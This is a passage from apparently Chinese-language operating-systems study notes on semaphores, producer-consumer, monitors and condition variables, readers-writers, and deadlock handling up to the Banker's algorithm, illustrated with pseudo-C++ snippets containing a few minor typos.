&#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">V</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        sem++;</span><br><span class="line">        <span class="keyword">if</span>(sem &lt;= <span class="number">0</span>)&#123;</span><br><span class="line">            Remove a thread t from q;</span><br><span class="line">            <span class="built_in">wakeup</span>(t);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-信号量的分类">b. 信号量的分类</h4><ul><li><p>信号量可分为两种信号量</p><ul><li><strong>二进制信号量</strong>，资源数目为0/1</li><li><strong>资源信号量</strong>：资源数目为任何非负值</li></ul><blockquote><p>两者等价，基于某一个可以实现另一个</p></blockquote></li><li><p>信号量的使用</p><ul><li>互斥访问：临界区的互斥访问控制</li><li>条件同步：线程间的事件等待</li></ul></li><li><p>用信号量实现临界区的互斥访问</p><ul><li>每类资源设置一个信号量，其初值为1</li><li>必须成对使用P()和V()操作<ul><li>P()操作保证互斥访问临界资源</li><li>V()操作在使用后释放临界资源</li><li>PV操作<strong>不能次序颠倒，重复或遗漏q</strong></li></ul></li></ul></li><li><p>缺点</p><ul><li>读/开发代码较为困难。程序员需要能运用信号量机制</li><li>容易出错。使用的信号量已经被另一个线程占用，或者忘记释放信号量</li><li>无法处理死锁问题</li></ul></li></ul><h5 id="生产者-消费者问题">生产者-消费者问题</h5><ul><li><p>问题描述</p><ul><li>一个或多个的生产者在生成数据后放在一个缓冲区中</li><li>单个消费者从缓冲区取出数据处理</li><li>任何时刻只能有一个生产者或消费者可访问该缓冲区</li></ul></li><li><p>问题分析</p><ul><li>任何时刻只能有一个线程操作缓冲区（互斥访问）</li><li>缓冲区为空时，消费者必须等待生产者（条件同步）</li><li>缓冲区为满时，生产者必须等待消费者（条件同步）</li></ul></li><li><p>用信号量描述每个约束</p><ul><li>二进制信号量mutex</li><li>资源信号量<code>fullBuffers</code></li><li>资源信号量<code>emptyBuffers</code></li></ul></li><li><p>代码解决</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">BoundedBuffer</span>&#123;</span><br><span class="line">    mutex = <span class="keyword">new</span> <span class="built_in">Semaphore</span>(<span class="number">1</span>);</span><br><span class="line">    fullBuffers = <span class="keyword">new</span> <span class="built_in">Semaphore</span>(<span class="number">0</span>);</span><br><span class="line">    emptyBuffers = <span class="keyword">new</span> <span class="built_in">Semaphore</span>(n);</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Deposit</span><span class="params">(c)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// 占用当前的空闲缓冲区（如果当前缓冲区已满，则挂起）</span></span><br><span class="line">        emptyBuffers-&gt;<span class="built_in">P</span>();</span><br><span class="line">        <span class="comment">// 独占当前缓冲区（如果当前缓冲区正在被使用，则挂起）</span></span><br><span class="line">        mutext-&gt;<span class="built_in">P</span>();</span><br><span class="line">        Add c to the buffer;</span><br><span class="line">        <span class="comment">// 释放当前缓冲区的占用</span></span><br><span class="line">        mutext-&gt;<span class="built_in">V</span>();</span><br><span class="line">        <span class="comment">// 由于向缓冲区中写入了数据，所以增加满缓冲区的资源数</span></span><br><span class="line">        fullBuffers-&gt;<span class="built_in">V</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Remove</span><span class="params">(c)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        fullBuffers-&gt;<span class="built_in">P</span>();</span><br><span class="line">        mutext-&gt;<span class="built_in">P</span>();</span><br><span class="line">        remove c from the buffer;</span><br><span class="line">        mutext-&gt;<span class="built_in">V</span>();</span><br><span class="line">        emptyBuffers-&gt;<span class="built_in">V</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>需要注意的是，<strong>PV操作的顺序一定要对应</strong>，否则可能出现<strong>死锁</strong>情况！</p></li></ul><h3 id="5-管程">5. 管程</h3><h4 id="a-相关概念-2">a. 相关概念</h4><ul><li>管程（Monitor）是一种用于多线程互斥访问共享资源的程序结构<ul><li>采用面向对象方法，简化了线程间的同步控制</li><li>任一时刻最多只有一个线程执行管程代码</li><li><strong>正在管程中的线程可临时放弃管程的互斥访问，等待事件出现时恢复</strong></li></ul></li><li>管程的使用<ul><li>在对象/模块中，收集相关共享数据</li><li>定义访问共享数据的方法</li></ul></li><li>管程的组成<ul><li>一个锁，控制管程代码的互斥访问</li><li>0-n个条件变量，用于管理共享数据的并发访问</li></ul></li><li>引入管程机制的目的：<ul><li>把分散在各进程中的临界区集中起来进行管理</li><li>防止进程有意或无意的违法同步操作</li><li>便于用高级语言来书写程序，也便于程序正确性验证。</li></ul></li></ul><h4 id="b-条件变量">b. 条件变量</h4><ul><li><p>条件变量（Condition Variable）是管程内的等待机制</p><ul><li>进入管程的线程因资源被占用而进入等待状态</li><li>每个条件变量表示一种等待原因，对应一个等待队列</li></ul></li><li><p><strong>Wait()</strong> 操作</p><ul><li>将自己阻塞在等待队列中</li><li>唤醒一个等待者或释放管程的互斥访问</li></ul></li><li><p><strong>Signal()</strong> 操作</p><ul><li>将等待队列中的一个线程唤醒</li><li>如果等待队列为空，则等同空操作</li></ul></li><li><p>用<strong>条件变量</strong>来解决生产者-消费者问题</p><blockquote><p>该部分代码请结合“用管程解决生产者-消费者问题”理解</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Condition</span>&#123;</span><br><span class="line">    <span class="type">int</span> numWaiting = <span class="number">0</span>;</span><br><span class="line">    WaitQueue q;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Wait</span><span class="params">(lock)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        numWaiting++;</span><br><span class="line">        add <span class="keyword">this</span> thread t to q;</span><br><span class="line">        <span class="built_in">release</span>(lock);  <span class="comment">// 释放原先占有的锁</span></span><br><span class="line">        <span class="built_in">schedule</span>(); <span class="comment">// need mutex</span></span><br><span class="line">        <span class="built_in">require</span>(lock); <span class="comment">// 获取原先被释放的锁</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Signal</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(numWaiting &gt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            Release a thread t from q;</span><br><span class="line">            <span class="built_in">wakeup</span>(t);</span><br><span class="line">            numWaiting--;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>用<strong>管程</strong>解决生产者-消费者问题</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">BoundBuffer</span>&#123;</span><br><span class="line">    ...</span><br><span class="line">    Lock lock;</span><br><span class="line">    <span class="type">int</span> count = <span class="number">0</span>;</span><br><span class="line">    Condition notFull, notEmpty;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Deposit</span><span class="params">(c)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// 如果写入的数据达到缓冲区的最大尺寸</span></span><br><span class="line">        <span class="keyword">while</span>(count == n)</span><br><span class="line">            <span class="comment">// 则当前线程等待</span></span><br><span class="line">            notFull.<span class="built_in">Wait</span>(&amp;lock);</span><br><span class="line">        Add c to the buffer;</span><br><span class="line">        count++;</span><br><span class="line">        notEmpty.<span class="built_in">Signal</span>();</span><br><span class="line">        lock-&gt;<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Remove</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// 如果当前缓冲区为空，则等待</span></span><br><span class="line">        <span class="keyword">while</span>(count == <span class="number">0</span>)</span><br><span class="line">            notEmpty.<span class="built_in">Wait</span>(&amp;lock);</span><br><span class="line">        Remove c from buffer;</span><br><span class="line">        count--;</span><br><span class="line">        notFull.<span class="built_in">Signal</span>();</span><br><span class="line">        lock-&gt;<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>条件变量的释放处理方式</p><blockquote><p>当T2线程执行Signal函数后，控制权应保留至T2线程结束，还是立即切换回T1线程呢？这两种不同的情况分别为Hasen管程与Hoare管程。</p></blockquote><ul><li><p>Hasen管程</p><blockquote><p>Hasen管程在某个线程执行Signal函数后，控制权不立即移交至另一个线程，而是先执行当前线程。</p></blockquote><ul><li><p>过程如下</p><table><thead><tr><th style="text-align:center">T1线程</th><th style="text-align:center">T2线程</th></tr></thead><tbody><tr><td style="text-align:center">l.acquire()</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">…</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">x.wait()</td><td style="text-align:center"></td></tr><tr><td style="text-align:center"></td><td style="text-align:center">l.acquire()</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">…</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">x.signal()</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">…</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">l.release()</td></tr><tr><td style="text-align:center">…</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">x.release()</td><td style="text-align:center"></td></tr></tbody></table></li><li><p>特点：线程切换次数较少，效率较高，主要用于真实OS和Java中。</p><ul><li>条件变量的释放<strong>只是一个提示</strong></li><li>需要重新检查条件</li></ul></li><li><p>代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">Deposit</span><span class="params">(c)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    lock-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">    <span class="comment">// 注意判断关键字为while</span></span><br><span class="line">    <span class="keyword">while</span>(count == n)</span><br><span class="line">        notFull.<span class="built_in">Wait</span>(&amp;lock);</span><br><span class="line">    Add c to the buffer;</span><br><span class="line">    count++;</span><br><span class="line">    notEmpty.<span class="built_in">Signal</span>();</span><br><span class="line">    lock-&gt;<span class="built_in">Release</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Hoare管程</p><blockquote><p>Hoare管程在某个线程执行Signal函数后，控制权<strong>立即移交</strong>至另一个线程。</p></blockquote><ul><li><p>过程如下</p><table><thead><tr><th style="text-align:center">T1线程</th><th style="text-align:center">T2线程</th></tr></thead><tbody><tr><td style="text-align:center">l.acquire()</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">…</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">x.wait()</td><td style="text-align:center"></td></tr><tr><td style="text-align:center"></td><td style="text-align:center">l.acquire()</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">…</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">x.signal()</td></tr><tr><td style="text-align:center">…</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">l.release()</td><td style="text-align:center"></td></tr><tr><td style="text-align:center"></td><td style="text-align:center">…</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">l.release()</td></tr></tbody></table></li><li><p>特点：通常的分析中，T1线程优先执行是更合理的，但需要做多次线程切换，<strong>低效</strong>。主要见于教科书中</p><ul><li>条件变量释放同时表示<strong>放弃管程访问</strong></li><li>释放后条件变量的状态可用</li></ul></li><li><p>代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">Deposit</span><span class="params">(c)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    lock-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">    <span class="comment">// 注意判断关键字为if</span></span><br><span class="line">    <span class="keyword">if</span>(count == n)</span><br><span class="line">        notFull.<span class="built_in">Wait</span>(&amp;lock);</span><br><span class="line">    Add c to the buffer;</span><br><span class="line">    count++;</span><br><span class="line">    notEmpty.<span class="built_in">Signal</span>();</span><br><span class="line">    lock-&gt;<span class="built_in">Release</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul></li></ul><h3 id="6-互斥综合：读者-写者问题">6. 互斥综合：读者-写者问题</h3><h4 id="a-问题描述">a. 问题描述</h4><ul><li>共享数据的两类使用者<ul><li>读者：只读取数据，不修改</li><li>写者：读取和修改数据</li></ul></li><li>问题描述：对共享数据的读写<ul><li>读-读允许：同一时刻允许多个读者同时读</li><li>读-写互斥：没有写者时读者才能读; 没有读者时写者才能写。</li><li>写-写互斥：没有其他写者时写者才能写</li></ul></li></ul><h4 id="b-用信号量解决问题">b. 用信号量解决问题</h4><blockquote><p>以下实现为<strong>读者优先</strong>。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Reader_Writer</span>&#123;</span><br><span class="line">    mutex WriteMutex = <span class="keyword">new</span> <span class="built_in">mutex</span>(<span class="number">1</span>); <span class="comment">// 控制读写操作的互斥</span></span><br><span class="line">    mutex CountMutex = <span class="keyword">new</span> <span class="built_in">mutex</span>(<span class="number">1</span>); <span class="comment">// 控制对读者计数的互斥修改</span></span><br><span class="line">    <span class="type">int</span> Rcount = <span class="number">0</span>; <span class="comment">// 共享变量，需要互斥修改</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Write</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="built_in">P</span>(WriteMutex);</span><br><span class="line">        write;</span><br><span class="line">        <span class="built_in">V</span>(WriteMutex);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Read</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="built_in">P</span>(CountMutex);</span><br><span class="line">        <span class="keyword">if</span>(Rcount == <span class="number">0</span>)</span><br><span class="line">            <span class="built_in">P</span>(WriteMutex);</span><br><span class="line">        ++Rcount;</span><br><span class="line">        <span class="built_in">V</span>(CountMutex);</span><br><span class="line"></span><br><span class="line">        read;</span><br><span class="line"></span><br><span class="line">        <span class="built_in">P</span>(CountMutex);</span><br><span class="line">        --Rcount;</span><br><span class="line">        <span class="keyword">if</span>(Rcount == <span class="number">0</span>)</span><br><span class="line">            <span class="built_in">V</span>(WriteMutex);</span><br><span class="line">        <span class="built_in">V</span>(CountMutex);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="c-优先策略">c. 优先策略</h4><ul><li>读者优先策略<ul><li>只要有读者正在读状态，后来的读者都能直接进入</li><li>如果读者持续不断的进入，则写者处于饥饿</li></ul></li><li>写者优先策略<ul><li>只要有写者就绪，写者应该尽快执行写操作</li><li>如果写者持续不断的就绪，则读者处于饥饿状态</li></ul></li><li>具体使用哪种策略，取决于具体的环境。</li></ul><h4 id="d-用管程解决问题">d. 用管程解决问题</h4><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Database</span>&#123;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="type">int</span> AR = <span class="number">0</span>; <span class="comment">// active readers</span></span><br><span class="line">    <span class="type">int</span> AW = <span class="number">0</span>; <span class="comment">// active Writers</span></span><br><span class="line">    <span class="type">int</span> WR = <span class="number">0</span>; <span class="comment">// waiting readers</span></span><br><span class="line">    <span class="type">int</span> WW = <span class="number">0</span>; <span class="comment">// waiting writers</span></span><br><span class="line">    Lock lock;</span><br><span class="line">    Condition okToRead;</span><br><span class="line">    Condition okToWrite;</span><br><span class="line">    <span class="comment">// 读者开始读</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">StartRead</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock.<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// 如果有写者正在/准备写入数据</span></span><br><span class="line">        <span class="keyword">while</span>(AW+WW &gt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 当前读者开始等待写者完成</span></span><br><span class="line">            WR++;</span><br><span class="line">            okToRead.<span class="built_in">wait</span>(&amp;lock);</span><br><span class="line">            WR--;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 读者开始读了，激活的读者+1</span></span><br><span class="line">        AR++;</span><br><span class="line">        lock.<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 读者结束读</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">DoneRead</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock.<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// 读者读取完成，激活的读者-1</span></span><br><span class="line">        AR--;</span><br><span class="line">        <span class="comment">// 如果当前没有正在读的读者，并且当前有正在等待的写者</span></span><br><span class="line">        <span class="keyword">if</span>(AR == <span class="number">0</span> &amp;&amp; WW &gt; <span class="number">0</span>)</span><br><span class="line">            <span class="comment">// 激活某个写者开始写入数据</span></span><br><span class="line">          okToWrite.<span class="built_in">signal</span>();</span><br><span class="line">        lock.<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 写者准备开始写</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">StartWrite</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock.<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// 如果当前有正在读的读者或正在写的写者</span></span><br><span class="line">        <span class="keyword">while</span>(AW+AR &gt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 当前写者等待</span></span><br><span class="line">            WW++;</span><br><span class="line">            okToWrite.<span class="built_in">wait</span>(&amp;lock);</span><br><span class="line">            WW--;</span><br><span class="line">        &#125;</span><br><span class="line">        AW++;</span><br><span class="line">        lock.<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 写者结束写</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">DOneWrite</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock.<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// 当前写者结束写操作</span></span><br><span class="line">        AW--;</span><br><span class="line">        <span class="comment">// 如果存在等待的写者</span></span><br><span class="line">        <span class="keyword">if</span>(WW &gt; <span class="number">0</span>)</span><br><span class="line">            <span class="comment">// 唤醒某个等待的写者</span></span><br><span class="line">            okToWrite.<span class="built_in">signal</span>();</span><br><span class="line">        <span class="comment">// 如果没有等待的写者，但有等待的读者</span></span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>(WR &gt; <span class="number">0</span>)</span><br><span class="line">            <span class="comment">// 唤醒所有读者开始等待数据</span></span><br><span class="line">            okToRead.<span class="built_in">broadcast</span>();</span><br><span class="line">        lock.<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Read</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// wait until no readers</span></span><br><span class="line">        <span class="built_in">StartRead</span>();</span><br><span class="line">        read database;</span><br><span class="line">        <span class="comment">// checkout - wake up waiting writers;</span></span><br><span class="line">        <span class="built_in">DoneRead</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Write</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// wait until no readers/writers</span></span><br><span class="line">        <span class="built_in">StartWrite</span>();</span><br><span class="line">        write database;</span><br><span class="line">        <span class="comment">// checkout - wake up waiting readers/writers;</span></span><br><span class="line">        <span class="built_in">DoneWrite</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="7-死锁">7. 死锁</h3><h4 id="a-死锁概念">a. 死锁概念</h4><h5 id="1-进程访问资源的流程">1) 进程访问资源的流程</h5><ul><li>资源类型$R_1, R_2, …， R_m$: CPU执行时间，内存空间，I/O设备等。</li><li>每类资源$R_i$有$W_i$个实例</li><li>进程访问资源的流程<ul><li>请求/获取：申请空闲资源</li><li>使用/占用：进程占用资源</li><li>释放：资源状态由占用变成空闲。</li></ul></li></ul><h5 id="2-资源分类">2) 资源分类</h5><ul><li>可重用资源（Reusable Resource）<ul><li>资源不能被删除且自任何时刻只能有一个进程在使用</li><li>进程释放资源后，其他进程可重用</li><li>可重用资源示例：硬件如处理器、I/O设备等，软件如文件、数据库等</li><li>可能出现死锁：每个进程占用一部分资源并请求其他资源</li></ul></li><li>消费资源 (Consumable resource)<ul><li>资源创建和销毁</li><li>消耗资源示例：中断、信号、消息</li><li>可能出现死锁：进程间相互等待接收对方的消息</li></ul></li></ul><h5 id="3-出现死锁的必要条件">3) 出现死锁的必要条件</h5><ul><li>互斥：任何时刻只能有一个进程使用一个资源实例</li><li>持有并等待：进程保持至少一个资源，并正在等待获取其他进程持有的资源</li><li>非抢占：资源只能在进程使用后自愿释放</li><li>循环等待：进程间相互循环等待</li></ul><h4 id="b-死锁处理方法">b. 死锁处理方法</h4><blockquote><p>死锁检测较为复杂，通常由应用程序处理死锁，操作系统会忽略死锁</p></blockquote><h5 id="1-死锁预防">1) 死锁预防</h5><blockquote><p>死锁预防（Deadlock Prevention)  ： 确保系统永远不会进入死锁状态。</p></blockquote><p>预防是采用某种策略，<strong>限制</strong>并发进程对资源的请求，使系统在任何时刻都<strong>不满足死锁的必要条件</strong>。</p><ul><li><p>互斥：把互斥的共享资源封装成可同时访问的</p></li><li><p>持有并等待：进程请求资源时，要求它不持有任何其他资源。仅允许进程在开始执行时，一次请求所有需要的资源，但这种做法的资源利用率低。</p></li><li><p>非抢占：如进程请求不能立即分配的资源，则释放已经占用的资源。只在能够同时获得所有需要资源时，才执行分配操作。</p></li><li><p>循环等待：对资源排序，要求进程按顺序请求资源。</p></li></ul><h5 id="2-死锁避免">2) 死锁避免</h5><blockquote><p>死锁避免（Deadlock Avoidance）：在使用前进行判断，只允许不会出现死锁的进程请求资源。</p></blockquote><p>利用额外的先验信息，在分配资源时判断是否会出现死锁，只在不会出现死锁时分配资源。</p><ul><li>要求进程声明需要资源的<strong>最大数目</strong>。</li><li>限定<strong>提供</strong>与<strong>分配</strong>的资源数量，确保满足进程的<strong>最大</strong>需求。</li><li><strong>动态检查</strong>资源分配状态，确保不会出现环形等待。</li></ul><p>系统资源分配的安全状态</p><ul><li>当进程请求资源时，系统判断分配后是否处于安全状态。</li><li>系统处于安全状态：针对所有已占用进程，存在安全序列</li><li>序列$&lt;P_1, P_2,…,P_N&gt;$是安全的<ul><li>$P_i$要求的资源 &lt;= 当前可用资源 + 所有$P_j$持有资源。其中<code>j&lt;i</code>。</li><li>如果$P_i$的资源请求不能马上分配，则$P_i$等待所有$P_j(j &lt; i)$完成</li><li>$P_i$完成后，$P_i+1$可得到所需资源，执行并释放所分配的资源。</li><li>最终整个序列的所有$P_i$都能获得所需资源。</li></ul></li></ul><p><strong>银行家算法</strong>（Banker’s Algorithm）</p><blockquote><p>银行家算法是一个避免死锁产生的算法，以银行借贷分配策略为基础，判断并保证系统处于安全状态。</p></blockquote><ul><li><p>使用的数据结构</p><blockquote><p>n = 线程数量， m = 资源类型数量</p></blockquote><ul><li><strong>Max(总需求量)</strong>：n x m 矩阵，线程$T_i$最多请求类型$R_i$的资源$Max[i, j]$个实例</li><li><strong>Available(剩余空闲量)</strong>：长度为m的向量，当前有$Available[i]$个类型$R_j$的资源实例可用</li><li><strong>Allocation(已分配量)</strong>：n x m 矩阵，线程$T_i$当前分配了$Allocation[i, j]$个$R_j$的实例</li><li><strong>Need(未来需要量)</strong>： n x m矩阵，线程$T_i$未来需要$Need[i,j]$个$R_j$资源实例。</li></ul><blockquote><p>$Need[i, j] = Max[i, j] - Allocation[i, j]$</p></blockquote></li><li><p><strong>安全状态判断</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 